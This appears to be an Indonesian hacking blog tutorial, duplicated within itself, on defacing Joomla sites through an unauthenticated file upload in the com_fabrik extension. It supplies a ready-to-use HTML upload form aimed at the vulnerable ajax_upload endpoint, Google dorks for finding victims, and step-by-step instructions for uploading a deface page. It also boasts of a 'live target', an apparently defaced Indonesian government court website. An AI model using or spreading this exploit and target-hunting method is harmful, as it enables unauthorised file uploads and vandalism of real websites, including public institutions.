Cara Deface Com_Fabrik Upload With CSRF 2018
Oke Mentemen Kali Ini Gua Bakal Kasih Tau Cara Depes Com_Fabrik Dengan CSRF,Oke bahan Yang Kita Butuhkan Ialah :
1.CSRF
<form method="POST" action="HTTP://TAGRET.CO.LI/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file" />
<button>
Upload
</button>
</form>
2.Dork
-Inurl:index.php?Option=Com_Fabrik
-Inurl:index.php?Option=Com_Fabrik Site:
3.Exploit
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Berikut Caranya...
copy csrf ke notepad simpan dengan namacsrf.html
1.Dorking Dulu
2.Cari Site Yang Menurut Lo Vuln,Kalo Udah Tambahin Exploit Di Belakang Site Target Contoh : http://TARGET.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Kalo Vuln Ada Tulisan Seperti Ini Di Pojok Atas
3.Buka CSRF Yang Lu Copy Tadi
Ganti HTTP://TAGRET.CO.LI Jadi Taget Lu,Dan Save Dengan Format Html
4.Buka CSRF Tadi
5.Klik Browse>Pilih Script Deface Elu>Klik Upload
6.Copy Link Yang Ntar Keluar,atau http://site.co.li/namaScriptDepes.html
7.Dan TARRAAA!!! Berhasil Di Pepes :V
LIVE TARGET :
http://pn-jeneponto.go.id/Info.html
Oke Mentemen Kali Ini Gua Bakal Kasih Tau Cara Depes Com_Fabrik Dengan CSRF,Oke bahan Yang Kita Butuhkan Ialah :
1.CSRF
<form method="POST" action="HTTP://TAGRET.CO.LI/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file" />
<button>
Upload
</button>
</form>
2.Dork
-Inurl:index.php?Option=Com_Fabrik
-Inurl:index.php?Option=Com_Fabrik Site:
3.Exploit
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Berikut Caranya...
copy csrf ke notepad simpan dengan namacsrf.html
1.Dorking Dulu
2.Cari Site Yang Menurut Lo Vuln,Kalo Udah Tambahin Exploit Di Belakang Site Target Contoh : http://TARGET.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Kalo Vuln Ada Tulisan Seperti Ini Di Pojok Atas
 |
| Ciri Web Vuln |
Ganti HTTP://TAGRET.CO.LI Jadi Taget Lu,Dan Save Dengan Format Html
4.Buka CSRF Tadi
5.Klik Browse>Pilih Script Deface Elu>Klik Upload
 |
| LIHAT GAMBAR SUPAYA JELAS |
 |
| SUKSES MADAFAKA!!!!! |
http://pn-jeneponto.go.id/Info.html
